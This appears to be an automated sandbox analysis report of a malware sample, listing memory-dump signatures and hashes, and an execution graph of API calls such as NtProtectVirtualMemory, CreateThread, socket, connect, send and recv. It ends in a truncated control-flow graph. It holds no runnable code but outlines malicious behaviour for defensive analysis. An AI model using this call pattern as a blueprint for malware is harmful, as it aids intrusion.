                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                • API String ID: 0-2474120054
                                                                                                                • Opcode ID: 0000d175edb42f4126f7820857bf1ac36daf83d4ea36a3fc2bdb051c39165868
                                                                                                                • Instruction ID: 5f7ca239325164cc8d78ecfb7ed78c7311ef31b1de3657c9377aafd706f6f583
                                                                                                                • Opcode Fuzzy Hash: 0000d175edb42f4126f7820857bf1ac36daf83d4ea36a3fc2bdb051c39165868
                                                                                                                • Instruction Fuzzy Hash: 6CE18E30A147419FD726DF28C884B2ABBE0BB98314F140A5EF5A58B3F1D775D949CB42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • RTL: Resource at %p, xrefs: 01487B8E
                                                                                                                • RTL: Re-Waiting, xrefs: 01487BAC
                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01487B7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 0-871070163
                                                                                                                • Opcode ID: ba63b76a4e629f801cb85f0c110c2f68bf4bed0168110e618c315f0c5dd3aa35
                                                                                                                • Instruction ID: 407e436e4e0e34ad2554ec849aff80421f04e8ed0e521b214d959e18624e14b8
                                                                                                                • Opcode Fuzzy Hash: ba63b76a4e629f801cb85f0c110c2f68bf4bed0168110e618c315f0c5dd3aa35
                                                                                                                • Instruction Fuzzy Hash: CD4105313007029FE720DE29C850B6BB7E5EF98715F100A1EFA5AD77A0DB31E8058B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0148728C
                                                                                                                Strings
                                                                                                                • RTL: Resource at %p, xrefs: 014872A3
                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01487294
                                                                                                                • RTL: Re-Waiting, xrefs: 014872C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 885266447-605551621
                                                                                                                • Opcode ID: d4e91475c8b342255cc9968d6768398e224cd87f14a2156d8e69e6fa4532d1ff
                                                                                                                • Instruction ID: 6e44115d4c95ee430323fc3419f9d5e1c0f2842a98d277bf3b37cea427bcaacc
                                                                                                                • Opcode Fuzzy Hash: d4e91475c8b342255cc9968d6768398e224cd87f14a2156d8e69e6fa4532d1ff
                                                                                                                • Instruction Fuzzy Hash: 5D411431600202ABE710DF29CC41B6ABBA5FB64715F20061EF955DB760DB31F842C7D1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$]:%u
                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                • Opcode ID: cc1307f89b7a4194c8d2da3a2a1d84b17921c8f1f600b53c2f85f8f6c742a1b6
                                                                                                                • Instruction ID: ec14680f7bd66f18a72b1f883168f21097c1490e45cfd9fe5f78d832fcb4ee03
                                                                                                                • Opcode Fuzzy Hash: cc1307f89b7a4194c8d2da3a2a1d84b17921c8f1f600b53c2f85f8f6c742a1b6
                                                                                                                • Instruction Fuzzy Hash: 18318476A002199FDB61DE39CC40FEFB7F8EB54610F54059FE949E3260EB709A448BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-
                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                • Instruction ID: adbe3334a3e7a2628b42210f38525c7f6514356d9f163a11b45f20c3e63dd390
                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                • Instruction Fuzzy Hash: D191C571E002069BEFA4DF6EC8906BFBBA5AF44722F94452BED55A73E2D73089418710
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $$@
                                                                                                                • API String ID: 0-1194432280
                                                                                                                • Opcode ID: d5550a08835e897c9e7bce8f95e152631361a75a91d6740d5f705282c88fcd8f
                                                                                                                • Instruction ID: 72f38f03babd7d9b18a4eef076dbee068e144a983328d5f1fee1d66296062006
                                                                                                                • Opcode Fuzzy Hash: d5550a08835e897c9e7bce8f95e152631361a75a91d6740d5f705282c88fcd8f
                                                                                                                • Instruction Fuzzy Hash: 96812871D002699BDB35CF54CC44BEABBB8AB18754F0441EBEA19B7290D7709E85CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.3%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:4.7%
                                                                                                                Total number of Nodes:444
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 13809 e5d0edd 13811 e5d0f06 13809->13811 13810 e5d0fa4 13811->13810 13812 e5cd8f2 NtProtectVirtualMemory 13811->13812 13813 e5d0f9c 13812->13813 13814 e5d4382 ObtainUserAgentString 13813->13814 13814->13810 13491 e5cd2dd 13494 e5cd31a 13491->13494 13492 e5cd3fa 13493 e5cd328 SleepEx 13493->13493 13493->13494 13494->13492 13494->13493 13498 e5d7f12 13494->13498 13507 e5ce432 13494->13507 13517 e5cd0f2 13494->13517 13503 e5d7f48 13498->13503 13499 e5d8134 13499->13494 13500 e5d80e9 13502 e5d8125 13500->13502 13535 e5d7842 13500->13535 13543 e5d7922 13502->13543 13503->13499 13503->13500 13505 e5d8232 NtCreateFile 13503->13505 13523 e5d8f82 13503->13523 13505->13503 13508 e5ce45b 13507->13508 13516 e5ce4c9 13507->13516 13509 e5d8232 NtCreateFile 13508->13509 13508->13516 13510 e5ce496 13509->13510 13515 e5ce4c5 13510->13515 13564 e5ce082 13510->13564 13512 e5d8232 NtCreateFile 13512->13516 13513 e5ce4b6 13513->13515 13573 e5cdf52 13513->13573 13515->13512 13515->13516 13516->13494 13518 e5cd109 13517->13518 13522 e5cd1d3 13517->13522 13578 e5cd012 13518->13578 13520 e5d8f82 6 API calls 13520->13522 13521 e5cd113 13521->13520 13521->13522 13522->13494 13524 e5d8fb8 13523->13524 13527 e5d9081 13524->13527 13534 e5d9022 13524->13534 13551 e5d55b2 13524->13551 13526 e5d9134 13530 e5d91b2 13526->13530 13526->13534 13554 e5d5732 13526->13554 13527->13526 13529 e5d9117 getaddrinfo 13527->13529 13527->13534 13529->13526 13530->13534 13557 e5d56b2 13530->13557 13532 e5d97f4 setsockopt recv 13532->13534 13533 e5d9729 13533->13532 13533->13534 13534->13503 13536 e5d786d 13535->13536 13560 e5d8232 13536->13560 13538 e5d7906 13538->13500 13539 e5d7888 13539->13538 13540 e5d8f82 6 API calls 13539->13540 13541 e5d78c5 13539->13541 13540->13541 13541->13538 13542 e5d8232 NtCreateFile 13541->13542 13542->13538 13544 e5d79c2 13543->13544 13545 e5d8232 NtCreateFile 13544->13545 13547 e5d79d6 13545->13547 13546 e5d7a9f 13546->13499 13547->13546 13548 e5d7a5d 13547->13548 13550 e5d8f82 6 API calls 13547->13550 13548->13546 13549 e5d8232 NtCreateFile 13548->13549 13549->13546 13550->13548 13552 e5d55ec 13551->13552 13553 e5d560a socket 13551->13553 13552->13553 13553->13527 13555 e5d5788 connect 13554->13555 13556 e5d576a 13554->13556 13555->13530 13556->13555 13558 e5d5705 send 13557->13558 13559 e5d56e7 13557->13559 13558->13533 13559->13558 13562 e5d825c 13560->13562 13563 e5d8334 13560->13563 13561 e5d8410 NtCreateFile 13561->13563 13562->13561 13562->13563 13563->13539 13565 e5ce420 13564->13565 13566 e5ce0aa 13564->13566 13565->13513 13566->13565 13567 e5d8232 NtCreateFile 13566->13567 13568 e5ce1f9 13567->13568 13569 e5d8232 NtCreateFile 13568->13569 13572 e5ce3df 13568->13572 13570 e5ce3c9 13569->13570 13571 e5d8232 NtCreateFile 13570->13571 13571->13572 13572->13513 13574 e5cdf70 13573->13574 13575 e5cdf84 13573->13575 13574->13515 13576 e5d8232 NtCreateFile 13575->13576 13577 e5ce046 13576->13577 13577->13515 13580 e5cd031 13578->13580 13579 e5cd0cd 13579->13521 13580->13579 13581 e5d8f82 6 API calls 13580->13581 13581->13579 13773 e5daa1f 13774 e5daa25 13773->13774 13777 e5ce5f2 13774->13777 13776 e5daa3d 13778 e5ce60e 13777->13778 13779 e5ce5fb 13777->13779 13778->13776 13779->13778 13780 e5d3662 6 API calls 13779->13780 13780->13778 13940 e5d0dd9 13941 e5d0df0 13940->13941 13942 e5d4382 ObtainUserAgentString 13941->13942 13943 e5d0ecd 13941->13943 13942->13943 13815 e5d2cd4 13817 e5d2cd8 13815->13817 13816 e5d3022 13817->13816 13821 e5d2352 13817->13821 13819 e5d2f0d 13819->13816 13830 e5d2792 13819->13830 13823 e5d239e 13821->13823 13822 e5d258e 13822->13819 13823->13822 13824 e5d24ec 13823->13824 13826 e5d2595 13823->13826 13825 e5d8232 NtCreateFile 13824->13825 13828 e5d24ff 13825->13828 13826->13822 13827 e5d8232 NtCreateFile 13826->13827 13827->13822 13828->13822 13829 e5d8232 NtCreateFile 13828->13829 13829->13822 13831 e5d27e0 13830->13831 13832 e5d8232 NtCreateFile 13831->13832 13836 e5d290c 13832->13836 13833 e5d2af3 13833->13819 13834 e5d2352 NtCreateFile 13834->13836 13835 e5d2602 NtCreateFile 13835->13836 13836->13833 13836->13834 13836->13835 13730 e5d9e12 13731 e5d8942 13730->13731 13732 e5d9e45 NtProtectVirtualMemory 13731->13732 13733 e5d9e70 13732->13733 13781 e5ce613 13782 e5ce620 13781->13782 13783 e5ce684 13782->13783 13784 e5d9e12 NtProtectVirtualMemory 13782->13784 13784->13782 13754 e5daa4d 13755 e5daa53 13754->13755 13758 e5ce782 13755->13758 13757 e5daa6b 13760 e5ce78f 13758->13760 13759 e5ce7ad 13759->13757 13760->13759 13762 e5d3662 13760->13762 13763 e5d366b 13762->13763 13771 e5d37ba 13762->13771 13764 e5cd0f2 6 API calls 13763->13764 13763->13771 13766 e5d36ee 13764->13766 13765 e5d3750 13768 e5d383f 13765->13768 13770 e5d3791 13765->13770 13765->13771 13766->13765 13767 e5d8f82 6 API calls 13766->13767 13767->13765 13769 e5d8f82 6 API calls 13768->13769 13768->13771 13769->13771 13770->13771 13772 e5d8f82 6 API calls 13770->13772 13771->13759 13772->13771 13785 e5d9e0a 13786 e5d9e45 NtProtectVirtualMemory 13785->13786 13787 e5d8942 13785->13787 13788 e5d9e70 13786->13788 13787->13786 13901 e5d214a 13902 e5d2153 13901->13902 13907 e5d2174 13901->13907 13904 e5d4382 ObtainUserAgentString 13902->13904 13903 e5d21e7 13905 e5d216c 13904->13905 13906 e5cd0f2 6 API calls 13905->13906 13906->13907 13907->13903 13909 e5cd1f2 13907->13909 13910 e5cd2c9 13909->13910 13911 e5cd20f 13909->13911 13910->13907 13913 e5d7f12 7 API calls 13911->13913 13914 e5cd242 13911->13914 13912 e5cd289 13912->13910 13916 e5cd0f2 6 API calls 13912->13916 13913->13914 13914->13912 13915 e5ce432 NtCreateFile 13914->13915 13915->13912 13916->13910 13742 e5d8f82 13743 e5d8fb8 13742->13743 13744 e5d55b2 socket 13743->13744 13746 e5d9081 13743->13746 13753 e5d9022 13743->13753 13744->13746 13745 e5d9134 13747 e5d5732 connect 13745->13747 13749 e5d91b2 13745->13749 13745->13753 13746->13745 13748 e5d9117 getaddrinfo 13746->13748 13746->13753 13747->13749 13748->13745 13750 e5d56b2 send 13749->13750 13749->13753 13752 e5d9729 13750->13752 13751 e5d97f4 setsockopt recv 13751->13753 13752->13751 13752->13753 13960 e5d0fbf 13962 e5d1016 13960->13962 13961 e5d10bb 13963 e5d10e8 13961->13963 13967 e5cd8f2 NtProtectVirtualMemory 13961->13967 13962->13961 13965 e5cd8f2 NtProtectVirtualMemory 13962->13965 13966 e5d10f0 13962->13966 13964 e5d4382 ObtainUserAgentString 13963->13964 13964->13966 13965->13961 13967->13963 13885 e5d38be 13886 e5d38c3 13885->13886 13887 e5d39a6 13886->13887 13888 e5d3995 ObtainUserAgentString 13886->13888 13888->13887 13889 e5d50b9 13890 e5d51f0 13889->13890 13891 e5d50ed 13889->13891 13891->13890 13892 e5d8f82 6 API calls 13891->13892 13892->13890 13837 e5d10fb 13839 e5d1137 13837->13839 13838 e5d12d5 13839->13838 13840 e5cd8f2 NtProtectVirtualMemory 13839->13840 13841 e5d128a 13840->13841 13842 e5cd8f2 NtProtectVirtualMemory 13841->13842 13845 e5d12a9 13842->13845 13843 e5d12cd 13844 e5d4382 ObtainUserAgentString 13843->13844 13844->13838 13845->13843 13846 e5cd8f2 NtProtectVirtualMemory 13845->13846 13846->13843 13789 e5d783a 13790 e5d7841 13789->13790 13791 e5d8f82 6 API calls 13790->13791 13792 e5d78c5 13791->13792 13793 e5d7906 13792->13793 13794 e5d8232 NtCreateFile 13792->13794 13794->13793 13921 e5d8f7a 13923 e5d8fb8 13921->13923 13922 e5d9022 13923->13922 13924 e5d55b2 socket 13923->13924 13926 e5d9081 13923->13926 13924->13926 13925 e5d9134 13925->13922 13927 e5d5732 connect 13925->13927 13929 e5d91b2 13925->13929 13926->13922 13926->13925 13928 e5d9117 getaddrinfo 13926->13928 13927->13929 13928->13925 13929->13922 13930 e5d56b2 send 13929->13930 13932 e5d9729 13930->13932 13931 e5d97f4 setsockopt recv 13931->13922 13932->13922 13932->13931 13847 e5d12f4 13848 e5d1349 13847->13848 13849 e5d149f 13848->13849 13851 e5cd8f2 NtProtectVirtualMemory 13848->13851 13850 e5cd8f2 NtProtectVirtualMemory 13849->13850 13854 e5d14c3 13849->13854 13850->13854 13852 e5d1480 13851->13852 13853 e5cd8f2 NtProtectVirtualMemory 13852->13853 13853->13849 13855 e5cd8f2 NtProtectVirtualMemory 13854->13855 13856 e5d1597 13854->13856 13855->13856 13857 e5cd8f2 NtProtectVirtualMemory 13856->13857 13859 e5d15bf 13856->13859 13857->13859 13858 e5d16e1 13860 e5d4382 ObtainUserAgentString 13858->13860 13862 e5cd8f2 NtProtectVirtualMemory 13859->13862 13863 e5d16b9 13859->13863 13861 e5d16e9 13860->13861 13862->13863 13863->13858 13864 e5cd8f2 NtProtectVirtualMemory 13863->13864 13864->13858 13944 e5da9f1 13945 e5da9f7 13944->13945 13948 e5cf852 13945->13948 13947 e5daa0f 13949 e5cf8e4 13948->13949 13950 e5cf865 13948->13950 13949->13947 13950->13949 13952 e5cf887 13950->13952 13954 e5cf87e 13950->13954 13951 e5d536f 13951->13947 13952->13949 13953 e5d3662 6 API calls 13952->13953 13953->13949 13954->13951 13955 e5d50c2 6 API calls 13954->13955 13955->13951 13865 e5cd0f1 13866 e5cd109 13865->13866 13870 e5cd1d3 13865->13870 13867 e5cd012 6 API calls 13866->13867 13868 e5cd113 13867->13868 13869 e5d8f82 6 API calls 13868->13869 13868->13870 13869->13870 13956 e5ce5f1 13957 e5ce60e 13956->13957 13958 e5ce606 13956->13958 13959 e5d3662 6 API calls 13958->13959 13959->13957 13968 e5da9b3 13969 e5da9bd 13968->13969 13972 e5cf6d2 13969->13972 13971 e5da9e0 13973 e5cf704 13972->13973 13974 e5cf6f7 13972->13974 13976 e5cf6ff 13973->13976 13977 e5cf72d 13973->13977 13979 e5cf737 13973->13979 13975 e5cd0f2 6 API calls 13974->13975 13975->13976 13976->13971 13981 e5d52c2 13977->13981 13979->13976 13980 e5d8f82 6 API calls 13979->13980 13980->13976 13982 e5d52df 13981->13982 13983 e5d52cb 13981->13983 13982->13976 13983->13982 13984 e5d50c2 6 API calls 13983->13984 13984->13982 13734 e5d8232 13736 e5d825c 13734->13736 13737 e5d8334 13734->13737 13735 e5d8410 NtCreateFile 13735->13737 13736->13735 13736->13737 13582 e5d9bac 13583 e5d9bb1 13582->13583 13616 e5d9bb6 13583->13616 13617 e5cfb72 13583->13617 13585 e5d9c2c 13586 e5d9c85 13585->13586 13588 e5d9c69 13585->13588 13589 e5d9c54 13585->13589 13585->13616 13587 e5d7ab2 NtProtectVirtualMemory 13586->13587 13592 e5d9c8d 13587->13592 13590 e5d9c6e 13588->13590 13591 e5d9c80 13588->13591 13593 e5d7ab2 NtProtectVirtualMemory 13589->13593 13594 e5d7ab2 NtProtectVirtualMemory 13590->13594 13591->13586 13595 e5d9c97 13591->13595 13653 e5d1102 13592->13653 13597 e5d9c5c 13593->13597 13598 e5d9c76 13594->13598 13599 e5d9c9c 13595->13599 13600 e5d9cbe 13595->13600 13639 e5d0ee2 13597->13639 13645 e5d0fc2 13598->13645 13621 e5d7ab2 13599->13621 13603 e5d9cd9 13600->13603 13604 e5d9cc7 13600->13604 13600->13616 13609 e5d7ab2 NtProtectVirtualMemory 13603->13609 13603->13616 13605 e5d7ab2 NtProtectVirtualMemory 13604->13605 13608 e5d9ccf 13605->13608 13663 e5d12f2 13608->13663 13612 e5d9ce5 13609->13612 13681 e5d1712 13612->13681 13619 e5cfb93 13617->13619 13618 e5cfcce 13618->13585 13619->13618 13620 e5cfcb5 CreateMutexW 13619->13620 13620->13618 13622 e5d7adf 13621->13622 13630 e5d7ebc 13622->13630 13693 e5cd8f2 13622->13693 13624 e5d7e5c 13625 e5cd8f2 NtProtectVirtualMemory 13624->13625 13626 e5d7e7c 13625->13626 13627 e5cd8f2 NtProtectVirtualMemory 13626->13627 13628 e5d7e9c 13627->13628 13629 e5cd8f2 NtProtectVirtualMemory 13628->13629 13629->13630 13631 e5d0de2 13630->13631 13632 e5d0df0 13631->13632 13634 e5d0ecd 13632->13634 13718 e5d4382 13632->13718 13635 e5cd412 13634->13635 13637 e5cd440 13635->13637 13636 e5cd473 13636->13616 13637->13636 13638 e5cd44d CreateThread 13637->13638 13638->13616 13641 e5d0f06 13639->13641 13640 e5d0fa4 13640->13616 13641->13640 13642 e5cd8f2 NtProtectVirtualMemory 13641->13642 13643 e5d0f9c 13642->13643 13644 e5d4382 ObtainUserAgentString 13643->13644 13644->13640 13647 e5d1016 13645->13647 13646 e5d10e8 13648 e5d4382 ObtainUserAgentString 13646->13648 13649 e5cd8f2 NtProtectVirtualMemory 13647->13649 13650 e5d10bb 13647->13650 13651 e5d10f0 13647->13651 13648->13651 13649->13650 13650->13646 13652 e5cd8f2 NtProtectVirtualMemory 13650->13652 13651->13616 13652->13646 13655 e5d1137 13653->13655 13654 e5d12d5 13654->13616 13655->13654 13656 e5cd8f2 NtProtectVirtualMemory 13655->13656 13657 e5d128a 13656->13657 13658 e5cd8f2 NtProtectVirtualMemory 13657->13658 13661 e5d12a9 13658->13661 13659 e5d12cd 13660 e5d4382 ObtainUserAgentString 13659->13660 13660->13654 13661->13659 13662 e5cd8f2 NtProtectVirtualMemory 13661->13662 13662->13659 13664 e5d1349 13663->13664 13665 e5d149f 13664->13665 13667 e5cd8f2 NtProtectVirtualMemory 13664->13667 13666 e5cd8f2 NtProtectVirtualMemory 13665->13666 13670 e5d14c3 13665->13670 13666->13670 13668 e5d1480 13667->13668 13669 e5cd8f2 NtProtectVirtualMemory 13668->13669 13669->13665 13671 e5cd8f2 NtProtectVirtualMemory 13670->13671 13672 e5d1597 13670->13672 13671->13672 13673 e5cd8f2 NtProtectVirtualMemory 13672->13673 13675 e5d15bf 13672->13675 13673->13675 13674 e5d16e1 13676 e5d4382 ObtainUserAgentString 13674->13676 13678 e5cd8f2 NtProtectVirtualMemory 13675->13678 13679 e5d16b9 13675->13679 13677 e5d16e9 13676->13677 13677->13616 13678->13679 13679->13674 13680 e5cd8f2 NtProtectVirtualMemory 13679->13680 13680->13674 13682 e5d1767 13681->13682 13683 e5cd8f2 NtProtectVirtualMemory 13682->13683 13688 e5d1903 13682->13688 13684 e5d18e3 13683->13684 13685 e5cd8f2 NtProtectVirtualMemory 13684->13685 13685->13688 13686 e5d19b7 13687 e5d4382 ObtainUserAgentString 13686->13687 13690 e5d19bf 13687->13690 13689 e5d1992 13688->13689 13691 e5cd8f2 NtProtectVirtualMemory 13688->13691 13689->13686 13692 e5cd8f2 NtProtectVirtualMemory 13689->13692 13690->13616 13691->13689 13692->13686 13694 e5cd987 13693->13694 13697 e5cd9b2 13694->13697 13708 e5ce622 13694->13708 13696 e5cdc0c 13696->13624 13697->13696 13698 e5cdba2 13697->13698 13700 e5cdac5 13697->13700 13699 e5d9e12 NtProtectVirtualMemory 13698->13699 13707 e5cdb5b 13699->13707 13712 e5d9e12 13700->13712 13702 e5d9e12 NtProtectVirtualMemory 13702->13696 13703 e5cdae3 13703->13696 13704 e5cdb3d 13703->13704 13706 e5d9e12 NtProtectVirtualMemory 13703->13706 13705 e5d9e12 NtProtectVirtualMemory 13704->13705 13705->13707 13706->13704 13707->13696 13707->13702 13709 e5ce67a 13708->13709 13710 e5ce684 13709->13710 13711 e5d9e12 NtProtectVirtualMemory 13709->13711 13710->13697 13711->13709 13716 e5d8942 13712->13716 13714 e5d9e45 NtProtectVirtualMemory 13715 e5d9e70 13714->13715 13715->13703 13717 e5d8967 13716->13717 13717->13714 13719 e5d43c7 13718->13719 13722 e5d4232 13719->13722 13721 e5d4438 13721->13634 13723 e5d425e 13722->13723 13726 e5d38c2 13723->13726 13725 e5d426b 13725->13721 13727 e5d3934 13726->13727 13728 e5d39a6 13727->13728 13729 e5d3995 ObtainUserAgentString 13727->13729 13728->13725 13729->13728 13795 e5ce42e 13796 e5ce45b 13795->13796 13804 e5ce4c9 13795->13804 13797 e5d8232 NtCreateFile 13796->13797 13796->13804 13798 e5ce496 13797->13798 13799 e5ce4c5 13798->13799 13800 e5ce082 NtCreateFile 13798->13800 13801 e5d8232 NtCreateFile 13799->13801 13799->13804 13802 e5ce4b6 13800->13802 13801->13804 13802->13799 13803 e5cdf52 NtCreateFile 13802->13803 13803->13799 13937 e5d572e 13938 e5d5788 connect 13937->13938 13939 e5d576a 13937->13939 13939->13938 13893 e5daaa9 13894 e5daaaf 13893->13894 13897 e5d5212 13894->13897 13896 e5daac7 13898 e5d521b 13897->13898 13899 e5d5237 13897->13899 13898->13899 13900 e5d50c2 6 API calls 13898->13900 13899->13896 13900->13899 13805 e5d422a 13806 e5d425e 13805->13806 13807 e5d38c2 ObtainUserAgentString 13806->13807 13808 e5d426b 13807->13808 13871 e5d52e4 13872 e5d536f 13871->13872 13873 e5d5305 13871->13873 13873->13872 13875 e5d50c2 13873->13875 13876 e5d51f0 13875->13876 13877 e5d50cb 13875->13877 13876->13872 13877->13876 13878 e5d8f82 6 API calls 13877->13878 13878->13876 13933 e5cfb66 13935 e5cfb6a 13933->13935 13934 e5cfcce 13935->13934 13936 e5cfcb5 CreateMutexW 13935->13936 13936->13934 13879 e5d2ce2 13881 e5d2dd9 13879->13881 13880 e5d3022 13881->13880 13882 e5d2352 NtCreateFile 13881->13882 13883 e5d2f0d 13882->13883 13883->13880 13884 e5d2792 NtCreateFile 13883->13884 13884->13883

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 e5d8f82-e5d8fb6 1 e5d8fb8-e5d8fbc 0->1 2 e5d8fd6-e5d8fd9 0->2 1->2 3 e5d8fbe-e5d8fc2 1->3 4 e5d8fdf-e5d8fed 2->4 5 e5d98fe-e5d990c 2->5 3->2 8 e5d8fc4-e5d8fc8 3->8 6 e5d98f6-e5d98f7 4->6 7 e5d8ff3-e5d8ff7 4->7 6->5 9 e5d8fff-e5d9000 7->9 10 e5d8ff9-e5d8ffd 7->10 8->2 11 e5d8fca-e5d8fce 8->11 12 e5d900a-e5d9010 9->12 10->9 10->12 11->2 13 e5d8fd0-e5d8fd4 11->13 14 e5d903a-e5d9060 12->14 15 e5d9012-e5d9020 12->15 13->2 13->4 17 e5d9068-e5d907c call e5d55b2 14->17 18 e5d9062-e5d9066 14->18 15->14 16 e5d9022-e5d9026 15->16 16->6 19 e5d902c-e5d9035 16->19 22 e5d9081-e5d90a2 17->22 18->17 20 e5d90a8-e5d90ab 18->20 19->6 23 e5d9144-e5d9150 20->23 24 e5d90b1-e5d90b8 20->24 22->20 25 e5d98ee-e5d98ef 22->25 23->25 28 e5d9156-e5d9165 23->28 26 e5d90ba-e5d90dc call e5d8942 24->26 27 e5d90e2-e5d90f5 24->27 25->6 26->27 27->25 30 e5d90fb-e5d9101 27->30 31 e5d917f-e5d918f 28->31 32 e5d9167-e5d9178 call e5d5552 28->32 30->25 36 e5d9107-e5d9109 30->36 33 e5d91e5-e5d921b 31->33 34 e5d9191-e5d91ad call e5d5732 31->34 32->31 40 e5d922d-e5d9231 33->40 41 e5d921d-e5d922b 33->41 43 e5d91b2-e5d91da 34->43 36->25 42 e5d910f-e5d9111 36->42 45 e5d9247-e5d924b 40->45 46 e5d9233-e5d9245 40->46 44 e5d927f-e5d9280 41->44 42->25 47 e5d9117-e5d9132 getaddrinfo 42->47 43->33 49 e5d91dc-e5d91e1 43->49 48 e5d9283-e5d92e0 call e5d9d62 call e5d6482 call e5d5e72 call e5da002 44->48 50 e5d924d-e5d925f 45->50 51 e5d9261-e5d9265 45->51 46->44 47->23 52 e5d9134-e5d913c 47->52 63 e5d92f4-e5d9354 call e5d9d92 48->63 64 e5d92e2-e5d92e6 48->64 49->33 50->44 54 e5d926d-e5d9279 51->54 55 e5d9267-e5d926b 51->55 52->23 54->44 55->48 55->54 69 e5d948c-e5d94b8 call e5d9d62 call e5da262 63->69 70 e5d935a-e5d9396 call e5d9d62 call e5da262 call e5da002 63->70 64->63 65 e5d92e8-e5d92ef call e5d6042 64->65 65->63 79 e5d94d9-e5d9590 call e5da262 * 3 call e5da002 * 2 call e5d6482 69->79 80 e5d94ba-e5d94d5 69->80 85 e5d9398-e5d93b7 call e5da262 call e5da002 70->85 86 e5d93bb-e5d93e9 call e5da262 * 2 70->86 111 e5d9595-e5d95b9 call e5da262 79->111 80->79 85->86 100 e5d93eb-e5d9410 call e5da002 call e5da262 86->100 101 e5d9415-e5d941d 86->101 100->101 104 e5d941f-e5d9425 101->104 105 e5d9442-e5d9448 101->105 108 e5d9467-e5d9487 call e5da262 104->108 109 e5d9427-e5d943d 104->109 110 e5d944e-e5d9456 105->110 105->111 108->111 109->111 110->111 115 e5d945c-e5d945d 110->115 121 e5d95bb-e5d95cc call e5da262 call e5da002 111->121 122 e5d95d1-e5d96ad call e5da262 * 7 call e5da002 call e5d9d62 call e5da002 call e5d5e72 call e5d6042 111->122 115->108 133 e5d96af-e5d96b3 121->133 122->133 135 e5d96ff-e5d972d call e5d56b2 133->135 136 e5d96b5-e5d96fa call e5d5382 call e5d57b2 133->136 145 e5d975d-e5d9761 135->145 146 e5d972f-e5d9735 135->146 157 e5d98e6-e5d98e7 136->157 147 e5d990d-e5d9913 145->147 148 e5d9767-e5d976b 145->148 146->145 151 e5d9737-e5d974c 146->151 152 e5d9779-e5d9784 147->152 153 e5d9919-e5d9920 147->153 154 e5d98aa-e5d98df call e5d57b2 148->154 155 e5d9771-e5d9773 148->155 151->145 158 e5d974e-e5d9754 151->158 160 e5d9786-e5d9793 152->160 161 e5d9795-e5d9796 152->161 153->160 154->157 155->152 155->154 157->25 158->145 159 e5d9756 158->159 159->145 160->161 164 e5d979c-e5d97a0 160->164 161->164 167 